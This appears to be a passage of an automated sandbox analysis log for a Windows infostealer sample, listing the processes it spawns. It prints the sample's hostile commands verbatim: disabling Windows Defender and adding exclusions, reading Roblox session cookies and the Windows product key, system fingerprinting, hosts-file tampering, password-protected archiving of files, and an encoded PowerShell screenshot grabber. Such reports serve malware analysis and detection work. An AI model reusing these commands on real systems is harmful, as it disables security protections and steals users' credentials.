              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCB6.tmp" "c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Users\user\Desktop\VSSADMIN.EXE.exe C:\Users\user\Desktop\VSSADMIN.EXE.exeJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCB6.tmp" "c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE74EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,59_2_00007FF6EE74EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE77B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,59_2_00007FF6EE77B57C
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE753144 GetDiskFreeSpaceExW,59_2_00007FF6EE753144
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
